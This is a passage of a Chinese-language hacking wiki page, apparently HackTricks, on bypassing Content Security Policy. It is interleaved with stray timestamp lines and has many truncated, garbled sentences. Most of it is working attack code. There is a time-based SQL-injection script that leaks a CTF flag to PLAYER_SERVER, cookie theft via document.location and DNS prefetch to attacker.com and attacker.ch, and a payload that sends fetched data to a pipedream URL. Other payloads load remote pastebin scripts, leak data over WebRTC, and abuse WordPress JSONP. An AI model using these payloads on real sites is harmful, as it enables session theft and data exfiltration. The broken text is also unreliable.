这次将提取一个**标志**,每当通过 SQLi **正确猜测一个字符**时,由于 sleep 函数,**响应**会**花费更多时间** 。然后,你将能够提取标志:
```html
<!-- code from https://github.com/ka0labs/ctf - writeups/tree/master/2019/nn9ed/x - oracle -->
2020-07-15 15:43:14 +00:00
< iframe name = f id = g > < / iframe > // The bot will load an URL with the payload
< script >
let host = "http://x-oracle-v1.nn9ed.ka0labs.org";
function gen(x) {
2023-08-03 19:12:22 +00:00
x = escape(x.replace(/_/g, '\\_'));
return `${host}/admin/search/x'union%20select(1)from%20challenge%20where%20flag%20like%20'${x}%25'and%201=sleep(0.1)%23` ;
2020-07-15 15:43:14 +00:00
}
function gen2(x) {
2023-08-03 19:12:22 +00:00
x = escape(x);
return `${host}/admin/search/x'union%20select(1)from%20challenge%20where%20flag='${x}'and%201=sleep(0.1)%23` ;
2020-07-15 15:43:14 +00:00
}
2023-08-03 19:12:22 +00:00
async function query(word, end=false) {
let h = performance.now();
f.location = (end ? gen2(word) : gen(word));
await new Promise(r => {
g.onload = r;
});
let diff = performance.now() - h;
return diff > 300;
2020-07-15 15:43:14 +00:00
}
let alphabet = '_abcdefghijklmnopqrstuvwxyz0123456789'.split('');
let postfix = '}'
async function run() {
2023-08-03 19:12:22 +00:00
let prefix = 'nn9ed{';
while (true) {
let i = 0;
for (i;i< alphabet.length ; i + + ) {
let c = alphabet[i];
let t = await query(prefix+c); // Check what chars returns TRUE or FALSE
console.log(prefix, c, t);
if (t) {
console.log('FOUND!')
prefix += c;
break;
}
}
if (i==alphabet.length) {
console.log('missing chars');
break;
}
let t = await query(prefix+'}', true);
if (t) {
prefix += '}';
break;
}
}
new Image().src = 'http://PLAYER_SERVER/?' + prefix; //Exfiltrate the flag
console.log(prefix);
2020-07-15 15:43:14 +00:00
}
run();
< / script >
```
2024-02-05 20:18:17 +00:00
### 通过书签工具
2020-07-15 15:43:14 +00:00
2024-02-09 08:09:21 +00:00
这种攻击需要一些社会工程学,攻击者**说服用户将链接拖放到浏览器的书签工具上**。这个书签工具会包含**恶意的 JavaScript** 代码,当拖放或点击时会在当前网页窗口的上下文中执行,**绕过 CSP 并允许窃取敏感信息**,比如 cookies 或令牌。
2023-06-26 10:50:26 +00:00
2024-02-05 20:18:17 +00:00
有关更多信息[**请查看原始报告**](https://socradar.io/csp-bypass-unveiled-the-hidden-threat-of-bookmarklets/)。
2023-06-26 10:50:26 +00:00
2024-02-05 20:18:17 +00:00
### 通过限制 CSP 来绕过 CSP
2023-06-26 10:50:26 +00:00
2024-02-09 08:09:21 +00:00
在[**这个 CTF 解密**](https://github.com/google/google-ctf/tree/master/2023/web-biohazard/solution)中,通过在允许的 iframe 中注入一个更严格的 CSP 来绕过 CSP,
2023-08-02 15:09:22 +00:00
2024-02-05 20:18:17 +00:00
您可以使用**`csp`**属性**限制 iframe 的 CSP**:
2023-08-02 15:09:22 +00:00
{% code overflow="wrap" %}
```html
< iframe src = "https://biohazard-web.2023.ctfcompetition.com/view/[bio_id]" csp = "script-src https://biohazard-web.2023.ctfcompetition.com/static/closure-library/ https://biohazard-web.2023.ctfcompetition.com/static/sanitizer.js https://biohazard-web.2023.ctfcompetition.com/static/main.js 'unsafe-inline' 'unsafe-eval'" > < / iframe >
```
{% endcode %}
2024-02-09 08:09:21 +00:00
在[**这个CTF解密**](https://github.com/aszx87410/ctf-writeups/issues/48)中,通过**HTML注入**可以更加**限制**一个**CSP**, ,
可以使用**HTML meta标签**使CSP更加严格,
2023-08-02 15:09:22 +00:00
```html
< meta http-equiv = "Content-Security-Policy" content = "script-src ' self '
'unsafe-eval' 'strict-dynamic'
'sha256-whKF34SmFOTPK4jfYDy03Ea8zOwJvqmz%2boz%2bCtD7RE4='
'sha256-Tz/iYFTnNe0de6izIdG%2bo6Xitl18uZfQWapSbxHE6Ic=';">
```
2024-02-05 20:18:17 +00:00
### 使用 Content-Security-Policy-Report-Only 进行 JS 数据泄露
2023-08-03 19:12:22 +00:00
2024-02-09 08:09:21 +00:00
如果你能够让服务器响应头部 ** `Content-Security-Policy-Report-Only` ** 的值**由你控制**(可能是因为 CRLF) , , ** `<script>` ** **包裹**你想要泄露的**JS内容** ,并且由于高度可能不允许 `unsafe-inline` ,这将**触发 CSP 错误**,并且包含敏感信息的脚本的一部分将从 `Content-Security-Policy-Report-Only` 发送到服务器。
2023-08-03 19:12:22 +00:00
2024-02-05 20:18:17 +00:00
例如,[**查看这个 CTF writeup**](https://github.com/maple3142/My-CTF-Challenges/tree/master/TSJ%20CTF%202022/Nim%20Notes)。
2023-08-03 19:12:22 +00:00
2023-08-09 17:14:49 +00:00
### [CVE-2020-6519](https://www.perimeterx.com/tech-blog/2020/csp-bypass-vuln-disclosure/)
2020-09-09 09:16:35 +00:00
```javascript
document.querySelector('DIV').innerHTML="< iframe src = 'javascript:var s = document.createElement( \"script \");s.src = \"https://pastebin.com/raw/dw5cWGK6 \";document.body.appendChild(s);' ></ iframe > ";
```
2024-02-05 20:18:17 +00:00
### 使用CSP和Iframe泄露信息
2020-09-09 09:16:35 +00:00
2024-02-05 20:18:17 +00:00
- 创建一个指向URL( ,
- 然后, (
- 通过监听`securitypolicyviolation`事件,可以捕获`blockedURI`属性。该属性会显示被阻止的URI的域,
2021-07-19 19:50:23 +00:00
2024-02-09 08:09:21 +00:00
有趣的是, ,
2021-07-19 19:50:23 +00:00
2024-02-09 08:09:21 +00:00
另一种技术涉及利用CSP本身来推断秘密子域。这种方法依赖于二分搜索算法, , , , :
2024-02-05 20:18:17 +00:00
```markdown
2021-07-19 19:50:23 +00:00
img-src https://chall.secdriven.dev https://doc-1-3213.secdrivencontent.dev https://doc-2-3213.secdrivencontent.dev ... https://doc-17-3213.secdriven.dev
```
2024-02-05 20:18:17 +00:00
通过监视 CSP 阻止或允许的请求,可以缩小秘密子域中可能的字符范围,最终揭示完整的 URL。
这两种方法利用了浏览器中 CSP 实现和行为的微妙之处,展示了看似安全的策略如何无意中泄露敏感信息。
来自 [**这里** ](https://ctftime.org/writeup/29310 ) 的技巧。
2021-07-19 19:50:23 +00:00
2023-07-31 15:59:11 +00:00
< figure > < img src = "../../.gitbook/assets/image (1) (3) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-07-14 15:03:41 +00:00
2024-02-05 20:18:17 +00:00
加入 [**HackenProof Discord** ](https://discord.com/invite/N3FrSbmwdy ) 服务器,与经验丰富的黑客和赏金猎人交流!
2023-02-27 09:28:45 +00:00
2024-02-05 20:18:17 +00:00
**黑客见解**\
2024-02-09 08:09:21 +00:00
参与深入探讨黑客活动的刺激和挑战的内容
2023-02-27 09:28:45 +00:00
2024-01-02 22:21:01 +00:00
**实时黑客新闻**\
2024-02-05 20:18:17 +00:00
通过实时新闻和见解及时了解快节奏的黑客世界
2023-02-27 09:28:45 +00:00
2024-01-02 22:21:01 +00:00
**最新公告**\
2024-02-09 08:09:21 +00:00
通过最新的赏金任务发布和重要平台更新保持信息更新
2023-07-14 15:03:41 +00:00
2024-02-09 08:09:21 +00:00
**加入我们的** [**Discord** ](https://discord.com/invite/N3FrSbmwdy ) 并开始与顶尖黑客合作!
2022-10-27 23:22:18 +00:00
2024-02-05 20:18:17 +00:00
## 绕过 CSP 的不安全技术
2022-06-28 23:51:00 +00:00
2024-02-05 20:18:17 +00:00
### PHP 响应缓冲区超载
2022-06-28 23:51:00 +00:00
2024-02-05 20:18:17 +00:00
PHP 默认会将响应缓冲到 4096 字节。因此,如果 PHP 显示警告,通过在警告中提供足够的数据,响应将在 CSP 头之前发送,导致头部被忽略。\
2024-02-09 08:09:21 +00:00
然后,该技术基本上是通过在响应缓冲区中填充警告,使 CSP 头部不被发送。
2022-06-28 23:51:00 +00:00
2024-02-05 20:18:17 +00:00
灵感来自 [**这篇文章** ](https://hackmd.io/@terjanq/justCTF2020-writeups#Baby-CSP-web-6-solves-406-points )。
2022-06-28 23:51:00 +00:00
2023-08-03 19:12:22 +00:00
### 重写错误页面
2022-06-28 23:51:00 +00:00
2024-02-05 20:18:17 +00:00
从 [**这篇文章** ](https://blog.ssrf.kr/69 ) 看来,通过加载一个错误页面(可能没有 CSP) ,
2022-06-28 23:51:00 +00:00
```javascript
a = window.open('/' + 'x'.repeat(4100));
setTimeout(function() {
2023-08-03 19:12:22 +00:00
a.document.body.innerHTML = `<img src=x onerror="fetch('https://filesharing.m0lec.one/upload/ffffffffffffffffffffffffffffffff').then(x=>x.text()).then(x=>fetch('https://enllwt2ugqrt.x.pipedream.net/'+x))">` ;
2022-06-28 23:51:00 +00:00
}, 1000);
```
### SOME + 'self' + wordpress
2024-02-09 08:09:21 +00:00
SOME是一种技术, ( ) , , :
2022-06-28 23:51:00 +00:00
{% content-ref url="../xss-cross-site-scripting/some-same-origin-method-execution.md" %}
[some-same-origin-method-execution.md ](../xss-cross-site-scripting/some-same-origin-method-execution.md )
{% endcontent-ref %}
2024-02-05 20:18:17 +00:00
此外,**wordpress**在`/wp-json/wp/v2/users/1?_jsonp=data`中有一个**JSONP**端点,将在输出中**反射**发送的**数据**(仅限字母、数字和点)。
2022-06-28 23:51:00 +00:00
2024-02-09 08:09:21 +00:00
攻击者可以滥用该端点对WordPress执行**生成SOME攻击**,并将其嵌入到`< script s ` rc = `/wp-json/wp/v2/users/1?_jsonp=some_attack > < / script > `中,请注意此**脚本**将被**加载**,因为它被'自身'允许。此外, , , ,
2024-02-05 20:18:17 +00:00
有关如何执行此攻击的更多信息,请查看[https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/](https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/)
2022-06-28 23:51:00 +00:00
2024-02-05 20:18:17 +00:00
## CSP数据泄漏绕过
2022-04-20 21:55:42 +00:00
2024-02-09 08:09:21 +00:00
如果存在严格的CSP不允许您与外部服务器**交互**,则有一些方法始终可以用于泄露信息。
2022-04-20 21:55:42 +00:00
2022-06-23 12:52:13 +00:00
### Location
2022-04-20 21:55:42 +00:00
2024-02-05 20:18:17 +00:00
您可以简单地更新位置以将秘密信息发送到攻击者的服务器:
2022-04-20 21:55:42 +00:00
```javascript
2023-08-03 19:12:22 +00:00
var sessionid = document.cookie.split('=')[1]+".";
2022-04-20 21:55:42 +00:00
document.location = "https://attacker.com/?" + sessionid;
```
2024-02-05 20:18:17 +00:00
### Meta标签
2022-04-20 21:55:42 +00:00
2024-02-05 20:18:17 +00:00
您可以通过注入一个meta标签来进行重定向( , )
2022-04-28 13:04:05 +00:00
```html
< meta http-equiv = "refresh" content = "1; http://attacker.com" >
```
2024-02-05 20:18:17 +00:00
### DNS Prefetch
2022-04-20 21:55:42 +00:00
2024-02-09 08:09:21 +00:00
为了加快页面加载速度,
2024-02-05 20:18:17 +00:00
您可以通过以下方式指示浏览器预先解析主机名:`< link reol = "dns-prefetch" href = "something.com" > `
2022-04-20 21:55:42 +00:00
2024-02-09 08:09:21 +00:00
您可以利用这种行为通过DNS请求**泄露敏感信息**:
2022-04-20 21:55:42 +00:00
```javascript
2023-08-03 19:12:22 +00:00
var sessionid = document.cookie.split('=')[1]+".";
2022-04-20 21:55:42 +00:00
var body = document.getElementsByTagName('body')[0];
body.innerHTML = body.innerHTML + "< link rel = \"dns-prefetch \" href = \"//" + sessionid + " attacker . ch \"> ";
```
2023-08-03 19:12:22 +00:00
另一种方法:
2022-04-20 21:55:42 +00:00
```javascript
const linkEl = document.createElement('link');
linkEl.rel = 'prefetch';
linkEl.href = urlWithYourPreciousData;
document.head.appendChild(linkEl);
```
2024-02-05 20:18:17 +00:00
为了避免这种情况发生, :
2022-04-20 21:55:42 +00:00
```
X-DNS-Prefetch-Control: off
```
{% hint style="info" %}
2024-02-05 20:18:17 +00:00
显然,这种技术在无头浏览器(机器人)中不起作用
2022-04-20 21:55:42 +00:00
{% endhint %}
2022-06-23 12:52:13 +00:00
### WebRTC
2022-04-20 21:55:42 +00:00
2024-02-09 08:09:21 +00:00
在一些页面上,您可以看到**WebRTC不检查CSP的`connect-src`策略**。
2023-08-29 19:09:12 +00:00
2024-02-09 08:09:21 +00:00
实际上, :
2022-04-20 21:55:42 +00:00
```javascript
2023-08-29 19:09:12 +00:00
(async()=>{p=new RTCPeerConnection({iceServers:[{urls: "stun:LEAK.dnsbin"}]});p.createDataChannel('');p.setLocalDescription(await p.createOffer())})()
2022-04-20 21:55:42 +00:00
```
2023-11-03 13:40:31 +00:00
另一个选项:
```javascript
var pc = new RTCPeerConnection({
"iceServers":[
{"urls":[
"turn:74.125.140.127:19305?transport=udp"
],"username":"_all_your_data_belongs_to_us",
"credential":"."
}]
});
pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);
```
2023-08-03 19:12:22 +00:00
## 在线检查CSP策略
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
* [https://csp-evaluator.withgoogle.com/ ](https://csp-evaluator.withgoogle.com )
2020-07-15 15:43:14 +00:00
* [https://cspvalidator.org/ ](https://cspvalidator.org/#url=https://cspvalidator.org/ )
2023-08-03 19:12:22 +00:00
## 自动创建CSP
2020-07-15 15:43:14 +00:00
[https://csper.io/docs/generating-content-security-policy ](https://csper.io/docs/generating-content-security-policy )
2023-08-03 19:12:22 +00:00
## 参考资料
2020-07-15 15:43:14 +00:00
2022-10-27 23:22:18 +00:00
* [https://hackdefense.com/publications/csp-the-how-and-why-of-a-content-security-policy/ ](https://hackdefense.com/publications/csp-the-how-and-why-of-a-content-security-policy/ )
* [https://lcamtuf.coredump.cx/postxss/ ](https://lcamtuf.coredump.cx/postxss/ )
* [https://bhavesh-thakur.medium.com/content-security-policy-csp-bypass-techniques-e3fa475bfe5d ](https://bhavesh-thakur.medium.com/content-security-policy-csp-bypass-techniques-e3fa475bfe5d )
* [https://0xn3va.gitbook.io/cheat-sheets/web-application/content-security-policy#allowed-data-scheme ](https://0xn3va.gitbook.io/cheat-sheets/web-application/content-security-policy#allowed-data-scheme )
2022-12-03 17:35:56 +00:00
* [https://www.youtube.com/watch?v=MCyPuOWs3dg ](https://www.youtube.com/watch?v=MCyPuOWs3dg )
2023-11-03 13:40:31 +00:00
* [https://aszx87410.github.io/beyond-xss/en/ch2/csp-bypass/ ](https://aszx87410.github.io/beyond-xss/en/ch2/csp-bypass/ )
2024-02-05 20:18:17 +00:00
* [https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/ ](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/ )
2022-10-27 23:22:18 +00:00
2020-07-15 15:43:14 +00:00
2023-07-31 15:59:11 +00:00
< figure > < img src = "../../.gitbook/assets/image (1) (3) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-07-14 15:03:41 +00:00
2024-02-05 20:18:17 +00:00
加入[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)服务器,与经验丰富的黑客和赏金猎人交流!
2023-07-14 15:03:41 +00:00
2024-02-05 20:18:17 +00:00
**黑客见解**\
参与深入探讨黑客行为的刺激和挑战
2023-02-27 09:28:45 +00:00
2024-01-02 22:21:01 +00:00
**实时黑客新闻**\
2024-02-05 20:18:17 +00:00
通过实时新闻和见解及时了解快节奏的黑客世界
2020-07-15 15:43:14 +00:00
2024-01-02 22:21:01 +00:00
**最新公告**\
2024-02-05 20:18:17 +00:00
随时了解最新的赏金任务发布和重要平台更新
2022-04-28 16:01:33 +00:00
2024-02-05 20:18:17 +00:00
**加入我们的** [**Discord** ](https://discord.com/invite/N3FrSbmwdy ),立即与顶尖黑客合作!
